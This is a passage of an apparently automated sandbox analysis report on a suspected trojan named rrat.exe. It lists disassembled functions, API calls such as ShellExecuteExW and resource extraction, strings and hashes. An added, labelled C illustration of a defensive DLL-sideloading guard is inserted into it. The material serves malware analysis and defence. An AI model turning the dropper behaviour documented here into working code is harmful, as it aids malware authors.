                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: 8dd3b15a97a32d9dda9ca555622d146d7e920c2a9cb425454f3e94258a8d1078
                                                              • Instruction ID: ab2a60b7cbc3734a363e2b979f3b18a56cf766844b1d65b6dfa4604bda78bf67
                                                              • Opcode Fuzzy Hash: 8dd3b15a97a32d9dda9ca555622d146d7e920c2a9cb425454f3e94258a8d1078
                                                              • Instruction Fuzzy Hash: 23D177B15093849FD760AF509A4AA9FB6E8FBCA704F50291DF18DBA150DF70A508CB63
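The API and string list above for the function at 00E86B8F reads like a DLL-sideloading guard: SetDefaultDllDirectories is resolved through GetProcAddress rather than imported (so the binary still starts on systems that lack the export), the executable's own folder is taken from GetModuleFileNameW, GetFileAttributesW probes for uxtheme.dll, dwmapi.dll and DXGIDebug.dll beside it, and on a hit the "Please remove %s from %s folder. It is unsecure to run %s until it is done." text is written to a console before ExitProcess. The C below is an added illustration of that pattern written for this page; it is not code recovered from rrats.exe, and the reading of the function's purpose is an inference from its strings and call sequence, not something the report states. On Windows the Win32 calls are live; elsewhere only the portable checks compile, and a constructed existence callback stands in for GetFileAttributesW so the scan loop can be exercised off-box.

```c
/* Added illustration of a DLL-sideload guard; not code from the analysed sample.
 * Reading of the listed function's intent (harden the search path, then refuse
 * to run next to a planted DLL) is an assumption drawn from its strings. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#ifndef LOAD_LIBRARY_SEARCH_SYSTEM32
#define LOAD_LIBRARY_SEARCH_SYSTEM32 0x00000800  /* older SDKs lack the define */
#endif
#endif

/* The three names the listed function compares against (its String ID line). */
static const char *const kSideloadNames[] = { "uxtheme.dll", "dwmapi.dll", "DXGIDebug.dll" };
enum { kSideloadCount = sizeof kSideloadNames / sizeof kSideloadNames[0] };

/* Case-insensitive compare: NTFS is case-insensitive, so "UXTHEME.DLL" must match. */
static bool name_eq(const char *a, const char *b)
{
    for (; *a && *b; ++a, ++b)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == '\0' && *b == '\0';
}

/* Index into kSideloadNames for a bare file name, or -1 when it is not one of them. */
int sideload_name_index(const char *filename)
{
    for (int i = 0; i < kSideloadCount; ++i)
        if (name_eq(filename, kSideloadNames[i]))
            return i;
    return -1;
}

/* Length of the directory prefix of a path, trailing separator included; 0 if none. */
size_t exe_directory_len(const char *path)
{
    const char *bs = strrchr(path, '\\');
    const char *fs = strrchr(path, '/');
    const char *sep = bs;
    if (fs && (!sep || fs > sep))
        sep = fs;
    return sep ? (size_t)(sep - path) + 1 : 0;
}

/* Copy that directory prefix into out; false if the path has no separator or does not fit. */
bool exe_directory(const char *path, char *out, size_t cap)
{
    size_t n = exe_directory_len(path);
    if (n == 0 || n + 1 > cap)
        return false;
    memcpy(out, path, n);
    out[n] = '\0';
    return true;
}

/* Probe dir for every known name through the supplied existence check and return
 * the first one present (a pointer into kSideloadNames), or NULL.  The check is a
 * callback so the same loop runs under test without Win32. */
const char *find_planted_dll(const char *dir, bool (*exists)(const char *path))
{
    static char candidate[1024];
    for (int i = 0; i < kSideloadCount; ++i) {
        int n = snprintf(candidate, sizeof candidate, "%s%s", dir, kSideloadNames[i]);
        if (n < 0 || (size_t)n >= sizeof candidate)
            continue;                      /* path too long to probe safely */
        if (exists(candidate))
            return kSideloadNames[i];
    }
    return NULL;
}

/* Constructed fixture (not real filesystem state): exactly one planted DLL "exists". */
bool fixture_exists(const char *path)
{
    return strcmp(path, "C:\\Tools\\dwmapi.dll") == 0;
}

#ifdef _WIN32
typedef BOOL (WINAPI *SetDefaultDllDirectories_t)(DWORD);

/* Resolve SetDefaultDllDirectories at run time, as the listed function does, so
 * the binary still loads where the export is absent; there, fall back to dropping
 * the current directory from the search order with SetDllDirectory(""). Add
 * LOAD_LIBRARY_SEARCH_APPLICATION_DIR only if the program ships its own DLLs. */
static void harden_dll_search_path(void)
{
    HMODULE k32 = GetModuleHandleA("kernel32");
    SetDefaultDllDirectories_t fn = k32
        ? (SetDefaultDllDirectories_t)GetProcAddress(k32, "SetDefaultDllDirectories")
        : NULL;
    if (fn && fn(LOAD_LIBRARY_SEARCH_SYSTEM32))
        return;
    SetDllDirectoryA("");
}

static bool win32_exists(const char *path)
{
    return GetFileAttributesA(path) != INVALID_FILE_ATTRIBUTES;
}

int main(void)
{
    char exe[MAX_PATH], dir[MAX_PATH];
    harden_dll_search_path();              /* before any non-KnownDLL load */
    if (GetModuleFileNameA(NULL, exe, MAX_PATH) == 0 || !exe_directory(exe, dir, sizeof dir))
        return 2;
    const char *hit = find_planted_dll(dir, win32_exists);
    if (hit) {                             /* the listed function prints, sleeps, then ExitProcess */
        fprintf(stderr, "Please remove %s from %s folder. It is unsecure to run %s until it is done.\n",
                hit, dir, exe);
        return 1;
    }
    return 0;
}
#else
int main(void)
{
    const char *hit = find_planted_dll("C:\\Tools\\", fixture_exists);
    printf("%s\n", hit ? hit : "clean");
    return 0;
}
#endif
```

The ordering is the point: the search-path hardening only governs loads issued after it, so the probe for already-planted names is still needed for anything the loader pulled in before main() ran, which is why the guard both restricts the search order and refuses to continue when one of the names is present.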
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: AES-0017$D+$D+$D+$D+$D+$D+$D+$D+$rrat.exe$z01$zip$zipx$zx01
                                                              • API String ID: 3519838083-70252433
                                                              • Opcode ID: 0f8bed308186beb289f56b79f3ae3ad0591fbfb07c198bdbed509228ac140205
                                                              • Instruction ID: 305925ba9ffbf0a8b0e9ed0ab230dd9f7aa2431364328749a2c3df19e05e4768
                                                              • Opcode Fuzzy Hash: 0f8bed308186beb289f56b79f3ae3ad0591fbfb07c198bdbed509228ac140205
                                                              • Instruction Fuzzy Hash: 63B28F71904214DFCB24EF69DE81AA97BE5BB48308F54212AFC0DF72A1DB329D46CB50
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E840D0
                                                              • _wcschr.LIBVCRUNTIME ref: 00E840F1
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E8410C
                                                                • Part of subcall function 00E83887: _wcslen.LIBCMT ref: 00E8388F
                                                                • Part of subcall function 00E868A5: _wcslen.LIBCMT ref: 00E868AB
                                                                • Part of subcall function 00E878FD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E83539,00000000,?,?), ref: 00E87919
                                                              • _wcslen.LIBCMT ref: 00E84449
                                                              • __fprintf_l.LIBCMT ref: 00E8457C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 557298264-801612888
                                                              • Opcode ID: 059e6147efbbf125e4eb6b7bd8385935f17d19f9effc735caae15f96c34e001b
                                                              • Instruction ID: 8510f2b61ad9705e28c56010fe44f7e5229565b9f934c776aef5f00fb30b024c
                                                              • Opcode Fuzzy Hash: 059e6147efbbf125e4eb6b7bd8385935f17d19f9effc735caae15f96c34e001b
                                                              • Instruction Fuzzy Hash: 0032D0B190021AABDF29FF64C841AEE77A5FF05704F40612AF90DB72D1EB719984CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1281 e92512-e9253e call e905a8 GetDlgItem 1284 e92540-e9256d call e8e4a5 ShowWindow SendMessageW * 2 1281->1284 1285 e92574-e925ae SendMessageW * 2 1281->1285 1284->1285 1287 e925cf-e92600 SendMessageW * 3 1285->1287 1288 e925b0-e925cb 1285->1288 1289 e92602-e9261f SendMessageW 1287->1289 1290 e92625-e9263b SendMessageW 1287->1290 1288->1287 1289->1290
                                                              APIs
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              • GetDlgItem.USER32(00000068,00EE6300), ref: 00E92526
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00E90065,00000001,?,?,00E907F9,00EA9D3C,00EE6300,00EE6300,00001000,00000000,00000000), ref: 00E9254E
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E92559
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E92567
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E9257D
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E92597
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E925DB
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E925E9
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E925F8
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E9261F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8ECC), ref: 00E9262E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 0bd0d118bfe6500bd62e169f040bdc2a38e58acc9e5b61517f8b436e01d60637
                                                              • Instruction ID: 6b6a2401fb982bab0a76f21265838baa29c88567f52ea5fc85ba3a6b80fc4607
                                                              • Opcode Fuzzy Hash: 0bd0d118bfe6500bd62e169f040bdc2a38e58acc9e5b61517f8b436e01d60637
                                                              • Instruction Fuzzy Hash: AA31C1B1145384BFE3019F21DC89FAB3EFCFB46714F000918F655BA292C7655A09CBA6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1292 e8f8e2-e8f8ff FindResourceW 1293 e8f9fb 1292->1293 1294 e8f905-e8f916 SizeofResource 1292->1294 1295 e8f9fd-e8fa01 1293->1295 1294->1293 1296 e8f91c-e8f92b LoadResource 1294->1296 1296->1293 1297 e8f931-e8f93c LockResource 1296->1297 1297->1293 1298 e8f942-e8f957 GlobalAlloc 1297->1298 1299 e8f95d-e8f966 GlobalLock 1298->1299 1300 e8f9f3-e8f9f9 1298->1300 1301 e8f9ec-e8f9ed GlobalFree 1299->1301 1302 e8f96c-e8f98a call e95220 CreateStreamOnHGlobal 1299->1302 1300->1295 1301->1300 1305 e8f98c-e8f9ae call e8f846 1302->1305 1306 e8f9e5-e8f9e6 GlobalUnlock 1302->1306 1305->1306 1311 e8f9b0-e8f9b8 1305->1311 1306->1301 1312 e8f9ba-e8f9ce GdipCreateHBITMAPFromBitmap 1311->1312 1313 e8f9d3-e8f9e1 1311->1313 1312->1313 1314 e8f9d0 1312->1314 1313->1306 1314->1313
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E9077D,00000066), ref: 00E8F8F5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F90C
                                                              • LoadResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F923
                                                              • LockResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F932
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00E9077D,00000066), ref: 00E8F94D
                                                              • GlobalLock.KERNEL32(00000000), ref: 00E8F95E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E8F982
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E8F9E6
                                                                • Part of subcall function 00E8F846: GdipAlloc.GDIPLUS(00000010), ref: 00E8F84C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E8F9C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 00E8F9ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: 8f79c6186ad7d96c9810180e2f998a296d908f114ef09b7aa9ac706eff478ada
                                                              • Instruction ID: 65d9f6ba69115b6a4165f602caec7c1edc807e2f12301b2ccdb1680298716be0
                                                              • Opcode Fuzzy Hash: 8f79c6186ad7d96c9810180e2f998a296d908f114ef09b7aa9ac706eff478ada
                                                              • Instruction Fuzzy Hash: B3317272500702AFD711AF62EC98E1B7BA8FF897547115929F80DB2260EF31EC08CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1316 e927cf-e927e7 call e93ac0 1319 e92a28-e92a30 1316->1319 1320 e927ed-e927f9 call e98793 1316->1320 1320->1319 1323 e927ff-e92827 call e94bd0 1320->1323 1326 e92829 1323->1326 1327 e92831-e9283f 1323->1327 1326->1327 1328 e92841-e92844 1327->1328 1329 e92852-e92858 1327->1329 1330 e92848-e9284e 1328->1330 1331 e9289b-e9289e 1329->1331 1333 e92850 1330->1333 1334 e92877-e92884 1330->1334 1331->1330 1332 e928a0-e928a6 1331->1332 1335 e928a8-e928ab 1332->1335 1336 e928ad-e928af 1332->1336 1337 e92862-e9286c 1333->1337 1338 e9288a-e9288e 1334->1338 1339 e92a00-e92a02 1334->1339 1335->1336 1342 e928c2-e928d8 call e8340c 1335->1342 1336->1342 1343 e928b1-e928b8 1336->1343 1344 e9285a-e92860 1337->1344 1345 e9286e 1337->1345 1340 e92894-e92899 1338->1340 1341 e92a06 1338->1341 1339->1341 1350 e92a0f 1341->1350 1351 e928da-e928e7 call e87d24 1342->1351 1352 e928f1-e928fc call e82680 1342->1352 1343->1342 1346 e928ba 1343->1346 1344->1337 1348 e92870-e92873 1344->1348 1345->1334 1346->1342 1348->1334 1353 e92a16-e92a18 1350->1353 1351->1352 1363 e928e9 1351->1363 1361 e92919-e92926 ShellExecuteExW 1352->1361 1362 e928fe-e92915 call e831a3 1352->1362 1354 e92a1a-e92a1c 1353->1354 1355 e92a27 1353->1355 1354->1355 1359 e92a1e-e92a21 ShowWindow 1354->1359 1355->1319 1359->1355 1361->1355 1365 e9292c-e92939 1361->1365 1362->1361 1367 e9293b-e92942 1365->1367 1368 e9294c-e9294e 1365->1368 1367->1368 1369 e92944-e9294a 1367->1369 1370 e92950-e92959 IsWindowVisible 1368->1370 1371 e92965-e92978 WaitForInputIdle call e92c53 1368->1371 1369->1368 1372 e929bb-e929c7 CloseHandle 1369->1372 1370->1371 1373 e9295b-e92963 ShowWindow 1370->1373 1377 e9297d-e92984 1371->1377 1375 e929c9-e929d6 call e87d24 1372->1375 1376 e929d8-e929e6 1372->1376 1373->1371 1375->1350 1375->1376 1376->1353 1379 e929e8-e929ea 1376->1379 1377->1372 1380 e92986-e9298e 1377->1380 1379->1353 1382 e929ec-e929f2 1379->1382 1380->1372 1383 e92990-e929a1 GetExitCodeProcess 1380->1383 1382->1353 1385 e929f4-e929fe 1382->1385 1383->1372 1384 e929a3-e929ad 1383->1384 1386 e929af 1384->1386 1387 e929b4 1384->1387 1385->1353 1386->1387 1387->1372
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E927EE
                                                              • ShellExecuteExW.SHELL32(?), ref: 00E9291E
                                                              • IsWindowVisible.USER32(?), ref: 00E92951
                                                              • ShowWindow.USER32(?,00000000), ref: 00E9295D
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00E9296E
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00E92999
                                                              • CloseHandle.KERNEL32(?), ref: 00E929BF
                                                              • ShowWindow.USER32(?,00000001), ref: 00E92A21
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3646668279-3750412487
                                                              • Opcode ID: e02c40d4cf9ea6fcfb1898fe9660f4462265e2a228440552c6f57b6016bfae75
                                                              • Instruction ID: f007f43d0c8d51266418bf950263c3acc3ec94309a3dd5709fa3d9c05c1c778b
                                                              • Opcode Fuzzy Hash: e02c40d4cf9ea6fcfb1898fe9660f4462265e2a228440552c6f57b6016bfae75
                                                              • Instruction Fuzzy Hash: CF51F731504380BEDF319B21D844AAB77E5AF85748F04281DFAC5B7291D7B1CD49C751

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1388 e892f0-e8932c 1389 e8932e call e8a1aa 1388->1389 1390 e8936f-e89377 1388->1390 1394 e89333-e89335 1389->1394 1392 e8944a 1390->1392 1393 e8937d-e89385 1390->1393 1395 e89450-e89478 call e89dd4 1392->1395 1393->1395 1396 e8938b 1393->1396 1397 e89368-e8936d 1394->1397 1398 e89337-e8934e call e82551 call e8a1aa 1394->1398 1407 e8947a-e8947d 1395->1407 1408 e894e3-e894ec 1395->1408 1400 e8939d-e893b5 call e93db0 1396->1400 1401 e8938d-e89397 1396->1401 1397->1390 1398->1397 1422 e89350-e89363 call e8176e 1398->1422 1400->1395 1409 e893bb 1400->1409 1401->1395 1401->1400 1411 e8947f-e89482 1407->1411 1412 e894b4-e894be call e8acdd 1407->1412 1413 e894ee-e894f4 1408->1413 1414 e893c9-e893cb 1409->1414 1415 e893bd-e893c3 1409->1415 1411->1412 1418 e89484-e8949f call e819eb call e8a5c4 1411->1418 1423 e894c3-e894c5 1412->1423 1419 e894fa-e89516 1413->1419 1420 e893cd 1414->1420 1421 e893fe-e89446 call e82409 1414->1421 1415->1395 1415->1414 1450 e894ac-e894af 1418->1450 1451 e894a1-e894a7 call e89cfd call e8262f 1418->1451 1425 e89518 1419->1425 1426 e89534-e8953f call e8a34d 1419->1426 1431 e893db-e893ec call e81d6a 1420->1431 1432 e893cf-e893d9 1420->1432 1421->1392 1447 e897cf-e897d4 1422->1447 1434 e894cb-e894de 1423->1434 1435 e89605-e89611 call e878d6 1423->1435 1428 e8951a-e8951c 1425->1428 1429 e8951e-e89532 1425->1429 1438 e89545-e89548 1426->1438 1428->1426 1428->1429 1429->1438 1431->1392 1455 e893ee 1431->1455 1456 e89621-e89624 1435->1456 1457 e89613-e8961a 1435->1457 1444 e8954e-e89571 1438->1444 1445 e895f1-e895f3 1438->1445 1444->1419 1452 e89573-e895cf call e87897 call e878d1 call e878d6 1444->1452 1453 e89600 1445->1453 1454 e895f5-e895fb call e8a007 1445->1454 1462 e897cd-e897ce 1450->1462 1451->1450 1522 e895eb 1452->1522 1523 e895d1-e895e6 call e8a007 1452->1523 1453->1435 1454->1453 1464 e893f8 1455->1464 1465 e893f0-e893f6 1455->1465 1458 e89630-e89637 1456->1458 1459 e89626-e8962b call e8181d 1456->1459 1457->1456 1466 e8961c 1457->1466 1468 e8963d-e89658 call e8d7a7 1458->1468 1469 e89722-e8972f 1458->1469 1459->1458 1462->1447 1464->1421 1465->1392 1465->1464 1466->1456 1487 e8965a 1468->1487 1488 e8966e-e8969c call e8a5c4 call e89dd4 1468->1488 1475 e8973c-e8973f 1469->1475 1476 e89731-e89738 1469->1476 1482 e89741-e89744 1475->1482 1483 e89746-e89755 1475->1483 1480 e8973a 1476->1480 1481 e89785-e8978a 1476->1481 1492 e8977c-e89783 1480->1492 1489 e897ab-e897b2 1481->1489 1490 e8978c-e8978e 1481->1490 1484 e89762-e89769 1482->1484 1485 e8975b 1483->1485 1486 e89757-e89759 1483->1486 1496 e89779-e8977b 1484->1496 1497 e8976b-e89772 1484->1497 1495 e8975d call e81663 1485->1495 1486->1495 1498 e8965c-e89662 1487->1498 1499 e89664-e89669 1487->1499 1521 e896a1-e896b3 1488->1521 1493 e897b9-e897be 1489->1493 1494 e897b4 call e89cfd 1489->1494 1501 e897a0-e897a6 call e82409 1490->1501 1502 e89790-e89796 1490->1502 1492->1481 1492->1493 1505 e897c0-e897c1 call e8262f 1493->1505 1506 e897c6-e897cb call e8a5c4 1493->1506 1494->1493 1495->1484 1496->1492 1497->1496 1508 e89774 1497->1508 1498->1488 1498->1499 1499->1488 1501->1489 1502->1501 1510 e89798-e8979e 1502->1510 1505->1506 1506->1462 1508->1496 1510->1489 1510->1501 1524 e896c5-e896df call e8a34d 1521->1524 1525 e896b5 1521->1525 1522->1445 1523->1413 1530 e896e3-e896ea 1524->1530 1526 e896bb-e896c3 1525->1526 1527 e896b7-e896b9 1525->1527 1526->1530 1527->1524 1527->1526 1530->1521 1533 e896ec-e8970e call e95b35 1530->1533 1533->1475 1536 e89710-e89717 1533->1536 1536->1469 1537 e89719-e89720 1536->1537 1537->1469 1537->1476
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E893AA
                                                                • Part of subcall function 00E8A1AA: __EH_prolog.LIBCMT ref: 00E8A1AF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: $D+$D+$D+$rrat.exe
                                                              • API String ID: 3007126557-1803408328
                                                              • Opcode ID: 84fe61d25fb926176d614234df04980c23e5cbcae63f63e74c0cdb6de3dcd8b6
                                                              • Instruction ID: 320c21e7d813638630d68e71be27cc52df95f3652c94209edd42bc46525eaef5
                                                              • Opcode Fuzzy Hash: 84fe61d25fb926176d614234df04980c23e5cbcae63f63e74c0cdb6de3dcd8b6
                                                              • Instruction Fuzzy Hash: 60D1A37090D340CFD725BF26AC85A7A3BA1E74531CF18213AE85DB72A3E772584ACB51

                                                              Control-flow Graph

                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00E91EDB
                                                                • Part of subcall function 00E8316F: _wcslen.LIBCMT ref: 00E83175
                                                              • _swprintf.LIBCMT ref: 00E91F0F
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(?,00000066,00ECFA3A), ref: 00E91F2F
                                                              • _wcschr.LIBVCRUNTIME ref: 00E91F60
                                                              • EndDialog.USER32(?,00000001), ref: 00E9203C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
